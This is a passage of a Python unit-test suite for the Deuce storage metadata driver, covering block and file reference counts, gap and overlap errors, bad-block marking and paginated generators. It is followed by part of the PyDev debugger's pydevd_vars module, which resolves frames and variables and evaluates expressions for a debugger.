self.assertFalse(driver.is_finalized(vault_id, file_id))
def test_vault_health_bad_blocks(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
num_blocks = 10
block_ids = [self.create_block_id() for _ in range(num_blocks)]
size = 1024
for block_id in block_ids:
gen_storage_id = self._genstorageid(block_id)
driver.register_block(vault_id, block_id, gen_storage_id, size)
bad_blocks, bad_files = driver.vault_health(vault_id)
self.assertEqual(bad_blocks, 0)
self.assertEqual(bad_files, 0)
for block_id in block_ids:
driver.mark_block_as_bad(vault_id, block_id)
bad_blocks, bad_files = driver.vault_health(vault_id)
self.assertEqual(bad_blocks, num_blocks)
self.assertEqual(bad_files, 0)
def test_vault_health_bad_files(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
num_blocks = 10
new_block_ids = [self.create_block_id() for _ in range(num_blocks)]
size = 1024
for block_id in new_block_ids:
gen_storage_id = self._genstorageid(block_id)
driver.register_block(vault_id, block_id, gen_storage_id, size)
driver.create_file(vault_id, file_id)
offsets = []
for i in range(num_blocks):
offsets.append(i * 1024)
driver.assign_blocks(vault_id, file_id, new_block_ids, offsets)
driver.finalize_file(vault_id, file_id, 1024 * num_blocks)
for block_id in new_block_ids:
driver.mark_block_as_bad(vault_id, block_id)
bad_blocks, bad_files = driver.vault_health(vault_id)
self.assertEqual(bad_files, 1)
self.assertEqual(bad_blocks, num_blocks)
def test_blockid_to_storageid(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
block_id = self.create_block_id()
size = 1024
gen_storage_id = self._genstorageid(block_id)
driver.register_block(vault_id, block_id, gen_storage_id, size)
meta_storage_id = driver.get_block_storage_id(vault_id, block_id)
meta_block_id = driver.get_block_metadata_id(vault_id, gen_storage_id)
self.assertEqual(gen_storage_id, meta_storage_id)
self.assertEqual(meta_block_id, block_id)
self.assertTrue(driver.has_block(vault_id, block_id))
driver.unregister_block(vault_id, block_id)
self.assertFalse(driver.has_block(vault_id, block_id))
bogus_storage_id = driver.get_block_storage_id(
vault_id,
self.create_block_id(b'bogus'))
self.assertIsNone(bogus_storage_id)
bogus_block_id = driver.get_block_metadata_id(
vault_id,
self._genstorageid(self.create_block_id(b'bogus')))
self.assertIsNone(bogus_block_id)
def test_block_crud(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
block_id = self.create_block_id()
size = 4096
reftime = 0
self.assertFalse(driver.has_block(vault_id, block_id))
try:
reftime = driver.get_block_ref_modified(vault_id, block_id)
except:
self.assertTrue(True)
self.assertEqual(reftime, 0)
try:
block_data = driver.get_block_data(vault_id, block_id)
size = block_data['blocksize']
reftime = block_data['reftime']
except:
self.assertTrue(True)
driver.register_block(vault_id, block_id, self._genstorageid(block_id),
size)
try:
new_reftime = driver.get_block_ref_modified(vault_id, block_id)
except:
self.assertTrue(True)
self.assertNotEqual(reftime, new_reftime)
self.assertTrue(driver.has_block(vault_id, block_id))
self.assertEqual(driver.get_block_data(vault_id,
block_id)['blocksize'], size)
# Call again, shouldn't throw
driver.register_block(vault_id, block_id, self._genstorageid(block_id),
size)
driver.unregister_block(vault_id, block_id)
self.assertFalse(driver.has_block(vault_id, block_id))
self.assertFalse(driver.has_block(vault_id, 'invalidid'))
def test_file_assignment_no_block(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
self.assertEqual(driver.has_file(vault_id,
file_id), False)
driver.create_file(vault_id, file_id)
self.assertEqual(driver.has_file(vault_id, file_id), True)
driver.assign_block(vault_id, file_id, 'block_a', 0)
driver.assign_block(vault_id, file_id, 'block_b', 1024)
with self.assertRaises(GapError) as ctx:
driver.finalize_file(vault_id, file_id, 2048)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.startpos, 0)
self.assertEqual(ctx.exception.endpos, 2048)
self.assertEqual(driver.is_finalized(vault_id, file_id),
False)
def test_delete_block_no_refs(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
block_id = 'block_0'
block_size = 1024
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
driver.unregister_block(vault_id, block_id)
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
def test_delete_block_with_refs(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
block_id = 'block_0'
block_size = 1024
driver.create_file(vault_id, file_id)
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
self.assertTrue(driver.has_block(vault_id, block_id))
# Should have refs until assigned, then it should have three
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
driver.assign_block(vault_id, file_id, block_id, 0)
driver.assign_block(vault_id, file_id, block_id, 1024)
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 2)
# Now test unregistering the block. This should fail
with self.assertRaises(ConstraintError) as ctx:
driver.unregister_block(vault_id, block_id)
self.assertEqual(ctx.exception.project_id, deuce.context.project_id)
self.assertEqual(ctx.exception.vault_id, vault_id)
def test_delete_file_check_refs(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
block_id = 'block_0'
block_size = 1024
driver.create_file(vault_id, file_id)
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
driver.assign_block(vault_id, file_id, block_id, 0)
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 1)
driver.delete_file(vault_id, file_id)
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
def test_assign_multiple_blocks_before_adding_blocks(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
block_ids = ['block_'.join(str(i)) for i in range(10)]
block_sizes = [random.randrange(10, 100) for _ in range(10)]
offsets = [0]
offset = 0
for block_size in block_sizes:
offset += block_size
offsets.append(offset)
driver.create_file(vault_id, file_id)
results = driver.has_blocks(vault_id, block_ids)
self.assertEqual(results, block_ids)
driver.assign_blocks(vault_id, file_id, block_ids, offsets[:-1])
for block_id, block_size in zip(block_ids, block_sizes):
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
results = driver.has_blocks(vault_id, block_ids)
self.assertEqual(results, [])
for block_id in block_ids:
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 1)
driver.delete_file(vault_id, file_id)
for block_id in block_ids:
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
def test_assign_multiple_blocks_after_adding_blocks(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
block_ids = ['block_'.join(str(i)) for i in range(10)]
block_sizes = [random.randrange(10, 100) for _ in range(10)]
offsets = [0]
offset = 0
for block_size in block_sizes:
offset += block_size
offsets.append(offset)
driver.create_file(vault_id, file_id)
results = driver.has_blocks(vault_id, block_ids)
self.assertEqual(results, block_ids)
for block_id, block_size in zip(block_ids, block_sizes):
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
results = driver.has_blocks(vault_id, block_ids)
self.assertEqual(results, [])
driver.assign_blocks(vault_id, file_id, block_ids, offsets[:-1])
for block_id in block_ids:
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 1)
driver.delete_file(vault_id, file_id)
for block_id in block_ids:
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
def test_block_references(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
num_elements = 1
# Create a bunch of file IDs
file_ids = [self.create_file_id() for _ in range(0, num_elements)]
# Now create some file IDs
block_ids = ['block_{0}'.format(x) for x in range(0, num_elements)]
block_size = 1024
# Create each of those files
for file_id in file_ids:
driver.create_file(vault_id, file_id)
for block_id in block_ids:
self.assertEqual(driver.has_block(vault_id, block_id), False)
# Check the block references on a non-existent block. Should be 0
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
self.assertEqual(driver.has_block(vault_id, block_id), True)
# Check the block references for these blocks. They should all be 0
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
# Now assign each block to a single file. The reference count for each
# block should be incremented to 1
for i in range(0, num_elements):
file_id = file_ids[i]
block_id = block_ids[i]
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
driver.assign_block(vault_id, file_id, block_id, 0)
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 1)
# Each 'file' is one block in length
driver.finalize_file(vault_id, file_id, file_size=block_size)
self.assertEqual(driver.is_finalized(vault_id, file_id), True)
# Finalizing the file should not change the block
# reference count
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 1)
def test_file_assignment_registration(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
self.assertEqual(driver.has_file(vault_id, file_id), False)
driver.create_file(vault_id, file_id)
self.assertEqual(driver.has_file(vault_id, file_id), True)
# Create one block before assigning and one block after
driver.register_block(vault_id, 'block_a',
self._genstorageid('block_a'),
1024)
driver.assign_block(vault_id, file_id, 'block_a', 0)
driver.assign_block(vault_id, file_id, 'block_b', 1024)
driver.register_block(vault_id, 'block_b',
self._genstorageid('block_b'),
1024)
self.assertEqual(driver.is_finalized(vault_id, file_id), False)
driver.finalize_file(vault_id, file_id, 2048)
self.assertEqual(driver.is_finalized(vault_id, file_id),
True)
def test_file_assignment_gap_at_front(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
min_block_size = 101
max_block_size = 10000
num_blocks = 10
driver.create_file(vault_id, file_id)
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
block_sizes = [random.randrange(min_block_size, max_block_size)
for _ in range(0, num_blocks)]
offsets = [sum(block_sizes[:x]) for x in range(0, num_blocks)]
blocklist = list(zip(block_ids, block_sizes, offsets))
file_size = sum(block_sizes)
# register all of the blocks
for block_id, block_size, offset in blocklist:
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
# Remove the first set of blocks, creating a gap at the beginning of
# the file
_, required_offset, _ = blocklist[0]
del blocklist[0]
# now for fun randomize the order that we
# will assign the blocks in
# random.shuffle(blocklist)
for block_id, block_size, offset in blocklist:
driver.assign_block(vault_id, file_id, block_id, offset)
with self.assertRaises(GapError) as ctx:
driver.finalize_file(vault_id, file_id, file_size)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.startpos, 0)
self.assertEqual(ctx.exception.endpos, required_offset)
def test_file_assignment_overlap_error_in_middle(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
min_block_size = 101
max_block_size = 10000
num_blocks = 10
driver.create_file(vault_id, file_id)
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
block_sizes = [random.randrange(min_block_size, max_block_size)
for _ in range(0, num_blocks)]
offsets = [sum(block_sizes[:x]) for x in range(0, num_blocks)]
# Now take the second block's offset and subtract 10 from it's
# offset. This should create an overlap with the second
# and first block.
expected_startpos = offsets[1] - 10
expected_endpos = offsets[1]
offsets[1] = offsets[1] - 10
blocklist = list(zip(block_ids, block_sizes, offsets))
file_size = sum(block_sizes)
# register all of the blocks
for block_id, block_size, offset in blocklist:
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
random.shuffle(blocklist)
for block_id, block_size, offset in blocklist:
driver.assign_block(vault_id, file_id, block_id, offset)
with self.assertRaises(OverlapError) as ctx:
driver.finalize_file(vault_id, file_id, file_size)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.startpos, expected_startpos)
self.assertEqual(ctx.exception.endpos, expected_endpos)
def test_file_assignment_gap_at_back(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
min_block_size = 101
max_block_size = 10000
num_blocks = 10
driver.create_file(vault_id, file_id)
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
block_sizes = [random.randrange(min_block_size, max_block_size)
for _ in range(0, num_blocks)]
offsets = [sum(block_sizes[:x]) for x in range(0, num_blocks)]
blocklist = list(zip(block_ids, block_sizes, offsets))
file_size = sum(block_sizes)
# register all of the blocks
for block_id, block_size, offset in blocklist:
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
# Remove the last set of blocks, creating a gap at EOF
missing_block = blocklist[-1]
del blocklist[-1]
random.shuffle(blocklist)
for block_id, block_size, offset in blocklist:
driver.assign_block(vault_id, file_id, block_id, offset)
with self.assertRaises(GapError) as ctx:
driver.finalize_file(vault_id, file_id, file_size)
def test_file_assignment_overlap_at_back(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
min_block_size = 101
max_block_size = 10000
num_blocks = 10
driver.create_file(vault_id, file_id)
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
block_sizes = [random.randrange(min_block_size, max_block_size)
for _ in range(0, num_blocks)]
offsets = [sum(block_sizes[:x]) for x in range(0, num_blocks)]
blocklist = list(zip(block_ids, block_sizes, offsets))
file_size = sum(block_sizes)
# Now create the error: short the file size by 10 bytes
expected_startpos = file_size - 10
expected_endpos = file_size
file_size -= 10
# register all of the blocks
for block_id, block_size, offset in blocklist:
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
random.shuffle(blocklist)
for block_id, block_size, offset in blocklist:
driver.assign_block(vault_id, file_id, block_id, offset)
with self.assertRaises(OverlapError) as ctx:
driver.finalize_file(vault_id, file_id, file_size)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.startpos, expected_startpos)
self.assertEqual(ctx.exception.endpos, expected_endpos)
def test_file_block_generator(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
num_blocks = 40
driver.create_file(vault_id, file_id)
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
# Note: the mongo DB mocking driver is hard-coded to use
# 40 1024-byte blocks.
block_sizes = [1024 for _ in range(0, num_blocks)]
offsets = [sum(block_sizes[:x]) for x in range(0, num_blocks)]
blocklist = list(zip(block_ids, block_sizes, offsets))
file_size = sum(block_sizes)
# register all of the blocks
for block_id, block_size, offset in blocklist:
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
for block_id, block_size, offset in blocklist:
driver.assign_block(vault_id, file_id, block_id, offset)
driver.finalize_file(vault_id, file_id)
output = list(driver.create_file_block_generator(vault_id, file_id))
outblocks, outoffsets = zip(*output)
self.assertEqual(list(outblocks), block_ids)
self.assertEqual(list(outoffsets), offsets)
def test_bad_block_marker(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
num_blocks = 50
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
for bid in block_ids:
driver.register_block(vault_id, bid,
self._genstorageid(bid), 1024)
# All of these blocks should exist, and none should be bad.
for bid in block_ids:
self.assertEqual(driver.has_block(vault_id, bid,
check_status=False), True)
self.assertEqual(driver.has_block(vault_id, bid,
check_status=True), True)
# Now check has_blocks. None of the blocks are bad so
# the list returned should be empty
self.assertEqual(driver.has_blocks(vault_id, block_ids,
check_status=True), [])
# Now get a random sampling of blocks that we can mark
# as being bad.
bad_block_ids = random.sample(block_ids, num_blocks // 2)
for bid in bad_block_ids:
driver.mark_block_as_bad(vault_id, bid)
for bid in block_ids:
self.assertEqual(driver.has_block(vault_id, bid,
check_status=False), True)
self.assertEqual(driver.has_block(vault_id, bid,
check_status=True), bid not in bad_block_ids)
# Ensure that we did not erase other information
# about the block such as the block size for good blocks
# (this is most likely in Cassandra)
for bid in list(set(block_ids) - set(bad_block_ids)):
self.assertEqual(driver.get_block_data(vault_id, bid)['blocksize'],
1024)
for bid in bad_block_ids:
with self.assertRaises(Exception):
data = driver.get_block_data(vault_id, bid)['blocksize']
self.assertEqual(
sorted(driver.has_blocks(vault_id, block_ids, check_status=True)),
sorted(bad_block_ids))
def test_assign_bad_blocks(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
num_blocks = 50
bad_block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
for bid in bad_block_ids:
driver.register_block(vault_id, bid,
self._genstorageid(bid), 1024)
# None of the blocks are bad so
# the list returned should be empty
self.assertEqual(driver.has_blocks(vault_id, bad_block_ids,
check_status=True), [])
# Let's mark all the blocks to be bad
for bid in bad_block_ids:
driver.mark_block_as_bad(vault_id, bid)
driver.create_file(vault_id, file_id)
offsets = []
for i in range(len(bad_block_ids)):
offsets.append(i * 1024)
# Now Let's try assign all the bad blocks to a file
driver.assign_blocks(vault_id,
file_id,
bad_block_ids,
offsets)
# GapError is raised, because bad blocks behave like
# non-existent blocks
with self.assertRaises(GapError):
driver.finalize_file(vault_id,
file_id,
1024 * len(bad_block_ids))
# Now, we go and re-register all the blocks, this should
# switch the isinvalid flag, and make the blocks valid again
# ergo, the blocks have now been healed, by being reuploaded.
for bid in bad_block_ids:
driver.register_block(vault_id, bid,
self._genstorageid(bid), 1024)
# Check if blocks are valid again
self.assertEqual(driver.has_blocks(vault_id, bad_block_ids,
check_status=True), [])
# Finalize file with valid blocks
driver.finalize_file(vault_id,
file_id,
1024 * len(bad_block_ids))
@ddt.data(50, 100, 150, 200)
def test_reset_block_status(self, total_blocks):
driver = self.create_driver()
vault_id = self.create_vault_id()
num_blocks = total_blocks
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
def reset_block_status_marker(marker):
return driver.reset_block_status(vault_id,
marker=marker)
# reset block status, across the vault
def reset_block_status():
marker = None
while True:
end_marker = reset_block_status_marker(marker)
if end_marker:
marker = end_marker
else:
break
# Reset block status, when there are no blocks in the vault
reset_block_status()
for bid in block_ids:
driver.register_block(vault_id, bid,
self._genstorageid(bid), 1024)
# All of these blocks should exist, and none should be bad.
for bid in block_ids:
self.assertEqual(driver.has_block(vault_id, bid,
check_status=False), True)
self.assertEqual(driver.has_block(vault_id, bid,
check_status=True), True)
# Now check has_blocks. None of the blocks are bad so
# the list returned should be empty
self.assertEqual(driver.has_blocks(vault_id, block_ids,
check_status=True), [])
# mark blocks as bad, across the vault
for bid in block_ids:
driver.mark_block_as_bad(vault_id, bid)
# Now check has_blocks. All of the blocks are bad so
# the list returned should be all the blocks in the vault.
self.assertEqual(driver.has_blocks(vault_id, block_ids,
check_status=True), block_ids)
# Reset block status for all blocks under the given vault
reset_block_status()
# Now check has_blocks. None of the blocks are bad so
# the list returned should be empty
self.assertEqual(driver.has_blocks(vault_id, block_ids,
check_status=True), [])
def test_file_block_generator_marker_limit(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
num_blocks = 40
driver.create_file(vault_id, file_id)
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
# Note: the mongo DB mocking driver is hard-coded to use
# 40 1024-byte blocks.
block_sizes = [1024 for _ in range(0, num_blocks)]
offsets = [sum(block_sizes[:x]) for x in range(0, num_blocks)]
blocklist = list(zip(block_ids, block_sizes, offsets))
file_size = sum(block_sizes)
# register all of the blocks
for block_id, block_size, offset in blocklist:
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
for block_id, block_size, offset in blocklist:
driver.assign_block(vault_id, file_id, block_id, offset)
driver.finalize_file(vault_id, file_id)
limit = 3
offset = 0
outblocks = []
outoffsets = []
iterations, remainder = divmod(num_blocks, limit)
for _ in range(0, iterations):
page = list(driver.create_file_block_generator(
vault_id, file_id, offset=offset, limit=limit))
self.assertEqual(len(page), limit)
tempblocks, tempoffsets = zip(*page)
outblocks.extend(tempblocks)
outoffsets.extend(tempoffsets)
offset = outoffsets[-1] + 1 if len(outoffsets) > 0 else None
if remainder > 0:
page = list(driver.create_file_block_generator(
vault_id, file_id, offset=offset, limit=limit))
self.assertEqual(len(page), remainder)
tempblocks, tempoffsets = zip(*page)
outblocks.extend(tempblocks)
outoffsets.extend(tempoffsets)
self.assertEqual(list(outblocks), block_ids)
self.assertEqual(list(outoffsets), offsets)
# Now try to do it again, this time with a ridiculous offset value
out = list(driver.create_file_block_generator(vault_id, file_id,
offset=999999, limit=3))
self.assertEqual(out, [])
def test_block_generator(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
min_block_size = 101
max_block_size = 10000
num_blocks = 20
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
block_sizes = [random.randrange(min_block_size, max_block_size)
for _ in range(0, num_blocks)]
block_data = list(zip(block_ids, block_sizes))
for block_id, block_size in block_data:
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
outblocks = list(driver.create_block_generator(vault_id))
self.assertEqual(sorted(block_ids), outblocks)
def test_block_generator_marker_limit(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
min_block_size = 101
max_block_size = 10000
num_blocks = 20
page_size = 3
page_count, remainder = divmod(num_blocks, page_size)
block_ids = ['block_{0:02d}'.format(id) for id in range(0, num_blocks)]
block_sizes = [random.randrange(min_block_size, max_block_size)
for _ in range(0, num_blocks)]
block_data = list(zip(block_ids, block_sizes))
for block_id, block_size in block_data:
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
marker = None
limit = page_size + 1
outblocks = []
for x in range(0, page_count):
page = list(driver.create_block_generator(vault_id, marker=marker,
limit=limit))
self.assertEqual(len(page), limit)
outblocks.extend(page[:-1])
marker = page[-1]
if remainder > 0:
page = list(driver.create_block_generator(vault_id, marker=marker,
limit=limit))
self.assertEqual(len(page), remainder)
outblocks.extend(page)
self.assertEqual(sorted(block_ids), outblocks)
def test_file_generator(self):
# Adds a bunch of files and checks the generator
driver = self.create_driver()
vault_id = self.create_vault_id()
num_files = 10
# Create a list of 100 files
file_ids = [self.create_file_id() for _ in range(0, num_files)]
for file_id in file_ids:
self.assertFalse(driver.has_file(vault_id, file_id))
out_id = driver.create_file(vault_id, file_id)
self.assertEqual(out_id, file_id)
self.assertTrue(driver.has_file(vault_id, file_id))
# None of the files have been finalized so we should
# get none back
gen = driver.create_file_generator(vault_id)
output = list(gen)
self.assertEqual(output, [])
# Now finalize the files and try to get them
for file_id in file_ids:
driver.finalize_file(vault_id, file_id)
gen = driver.create_file_generator(vault_id)
# Convert to a list of file ids.
output = list(gen)
# Why sorted? Deuce returns file ids sorted, but the list
# of file ids that we generated were not sorted when we
# created them above.
self.assertEqual(output, sorted(file_ids))
# Now try with markers
gen = driver.create_file_generator(vault_id,
marker=sorted(file_ids)[2], limit=3)
output = list(gen)
self.assertEqual(len(output), 3) # Limited query to 3
# We should be able to compare the list of
# file ids here with the ones that come from
# the other list
target_list = sorted(file_ids)[2:5]
self.assertEqual(target_list, output)
def test_vault_crud_and_generator(self):
driver = self.create_driver()
vaultids = list()
for n in range(5):
vault_id = self.create_vault_id()
driver.create_vault(vault_id)
vaultids.append(vault_id)
driver.create_vaults_generator(marker=None, limit=99)
driver.create_vaults_generator(marker=vaultids[0], limit=99)
for vault_id in vaultids:
driver.delete_vault(vault_id)
| |
""" pydevd_vars deals with variables:
resolution/conversion to XML.
"""
import pickle
from _pydevd_bundle.pydevd_constants import dict_contains, get_frame, get_thread_id
from _pydevd_bundle.pydevd_custom_frames import get_custom_frame
from _pydevd_bundle.pydevd_xml import ExceptionOnEvaluate, get_type, var_to_xml
from _pydev_imps._pydev_saved_modules import thread
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import sys # @Reimport
from _pydev_imps._pydev_saved_modules import threading
import traceback
from _pydevd_bundle import pydevd_save_locals
from _pydev_bundle.pydev_imports import Exec, quote, execfile
from _pydevd_bundle.pydevd_utils import to_string
# -------------------------------------------------------------------------- defining true and false for earlier versions
try:
__setFalse = False
except:
import __builtin__
setattr(__builtin__, 'True', 1)
setattr(__builtin__, 'False', 0)
# ------------------------------------------------------------------------------------------------------ class for errors
class VariableError(RuntimeError): pass
class FrameNotFoundError(RuntimeError): pass
def _iter_frames(initialFrame):
'''NO-YIELD VERSION: Iterates through all the frames starting at the specified frame (which will be the first returned item)'''
# cannot use yield
frames = []
while initialFrame is not None:
frames.append(initialFrame)
initialFrame = initialFrame.f_back
return frames
def dump_frames(thread_id):
sys.stdout.write('dumping frames\n')
if thread_id != get_thread_id(threading.currentThread()):
raise VariableError("find_frame: must execute on same thread")
curFrame = get_frame()
for frame in _iter_frames(curFrame):
sys.stdout.write('%s\n' % pickle.dumps(frame))
# ===============================================================================
# AdditionalFramesContainer
# ===============================================================================
class AdditionalFramesContainer:
lock = thread.allocate_lock()
additional_frames = {} # dict of dicts
def add_additional_frame_by_id(thread_id, frames_by_id):
AdditionalFramesContainer.additional_frames[thread_id] = frames_by_id
addAdditionalFrameById = add_additional_frame_by_id # Backward compatibility
def remove_additional_frame_by_id(thread_id):
del AdditionalFramesContainer.additional_frames[thread_id]
removeAdditionalFrameById = remove_additional_frame_by_id # Backward compatibility
def has_additional_frames_by_id(thread_id):
return dict_contains(AdditionalFramesContainer.additional_frames, thread_id)
def get_additional_frames_by_id(thread_id):
return AdditionalFramesContainer.additional_frames.get(thread_id)
def find_frame(thread_id, frame_id):
""" returns a frame on the thread that has a given frame_id """
try:
curr_thread_id = get_thread_id(threading.currentThread())
if thread_id != curr_thread_id:
try:
return get_custom_frame(thread_id, frame_id) # I.e.: thread_id could be a stackless frame id + thread_id.
except:
pass
raise VariableError("find_frame: must execute on same thread (%s != %s)" % (thread_id, curr_thread_id))
lookingFor = int(frame_id)
if AdditionalFramesContainer.additional_frames:
if dict_contains(AdditionalFramesContainer.additional_frames, thread_id):
frame = AdditionalFramesContainer.additional_frames[thread_id].get(lookingFor)
if frame is not None:
return frame
curFrame = get_frame()
if frame_id == "*":
return curFrame # any frame is specified with "*"
frameFound = None
for frame in _iter_frames(curFrame):
if lookingFor == id(frame):
frameFound = frame
del frame
break
del frame
# Important: python can hold a reference to the frame from the current context
# if an exception is raised, so, if we don't explicitly add those deletes
# we might have those variables living much more than we'd want to.
# I.e.: sys.exc_info holding reference to frame that raises exception (so, other places
# need to call sys.exc_clear())
del curFrame
if frameFound is None:
msgFrames = ''
i = 0
for frame in _iter_frames(get_frame()):
i += 1
msgFrames += str(id(frame))
if i % 5 == 0:
msgFrames += '\n'
else:
msgFrames += ' - '
errMsg = '''find_frame: frame not found.
Looking for thread_id:%s, frame_id:%s
Current thread_id:%s, available frames:
%s\n
''' % (thread_id, lookingFor, curr_thread_id, msgFrames)
sys.stderr.write(errMsg)
return None
return frameFound
except:
import traceback
traceback.print_exc()
return None
def getVariable(thread_id, frame_id, scope, attrs):
"""
returns the value of a variable
:scope: can be BY_ID, EXPRESSION, GLOBAL, LOCAL, FRAME
BY_ID means we'll traverse the list of all objects alive to get the object.
:attrs: after reaching the proper scope, we have to get the attributes until we find
the proper location (i.e.: obj\tattr1\tattr2)
:note: when BY_ID is used, the frame_id is considered the id of the object to find and
not the frame (as we don't care about the frame in this case).
"""
if scope == 'BY_ID':
if thread_id != get_thread_id(threading.currentThread()):
raise VariableError("getVariable: must execute on same thread")
try:
import gc
objects = gc.get_objects()
except:
pass # Not all python variants have it.
else:
frame_id = int(frame_id)
for var in objects:
if id(var) == frame_id:
if attrs is not None:
attrList = attrs.split('\t')
for k in attrList:
_type, _typeName, resolver = get_type(var)
var = resolver.resolve(var, k)
return var
# If it didn't return previously, we coudn't find it by id (i.e.: alrceady garbage collected).
sys.stderr.write('Unable to find object with id: %s\n' % (frame_id,))
return None
frame = find_frame(thread_id, frame_id)
if frame is None:
return {}
if attrs is not None:
attrList = attrs.split('\t')
else:
attrList = []
for attr in attrList:
attr.replace("@_@TAB_CHAR@_@", '\t')
if scope == 'EXPRESSION':
for count in xrange(len(attrList)):
if count == 0:
# An Expression can be in any scope (globals/locals), therefore it needs to evaluated as an expression
var = evaluate_expression(thread_id, frame_id, attrList[count], False)
else:
_type, _typeName, resolver = get_type(var)
var = resolver.resolve(var, attrList[count])
else:
if scope == "GLOBAL":
var = frame.f_globals
del attrList[0] # globals are special, and they get a single dummy unused attribute
else:
# in a frame access both locals and globals as Python does
var = {}
var.update(frame.f_globals)
var.update(frame.f_locals)
for k in attrList:
_type, _typeName, resolver = get_type(var)
var = resolver.resolve(var, k)
return var
def resolve_compound_variable(thread_id, frame_id, scope, attrs):
""" returns the value of the compound variable as a dictionary"""
var = getVariable(thread_id, frame_id, scope, attrs)
try:
_type, _typeName, resolver = get_type(var)
return resolver.get_dictionary(var)
except:
sys.stderr.write('Error evaluating: thread_id: %s\nframe_id: %s\nscope: %s\nattrs: %s\n' % (
thread_id, frame_id, scope, attrs,))
traceback.print_exc()
def resolve_var(var, attrs):
attrList = attrs.split('\t')
for k in attrList:
type, _typeName, resolver = get_type(var)
var = resolver.resolve(var, k)
try:
type, _typeName, resolver = get_type(var)
return resolver.get_dictionary(var)
except:
traceback.print_exc()
def custom_operation(thread_id, frame_id, scope, attrs, style, code_or_file, operation_fn_name):
"""
We'll execute the code_or_file and then search in the namespace the operation_fn_name to execute with the given var.
code_or_file: either some code (i.e.: from pprint import pprint) or a file to be executed.
operation_fn_name: the name of the operation to execute after the exec (i.e.: pprint)
"""
expressionValue = getVariable(thread_id, frame_id, scope, attrs)
try:
namespace = {'__name__': '<custom_operation>'}
if style == "EXECFILE":
namespace['__file__'] = code_or_file
execfile(code_or_file, namespace, namespace)
else: # style == EXEC
namespace['__file__'] = '<customOperationCode>'
Exec(code_or_file, namespace, namespace)
return str(namespace[operation_fn_name](expressionValue))
except:
traceback.print_exc()
def eval_in_context(expression, globals, locals):
result = None
try:
result = eval(expression, globals, locals)
except Exception:
s = StringIO()
traceback.print_exc(file=s)
result = s.getvalue()
try:
try:
etype, value, tb = sys.exc_info()
result = value
finally:
etype = value = tb = None
except:
pass
result = ExceptionOnEvaluate(result)
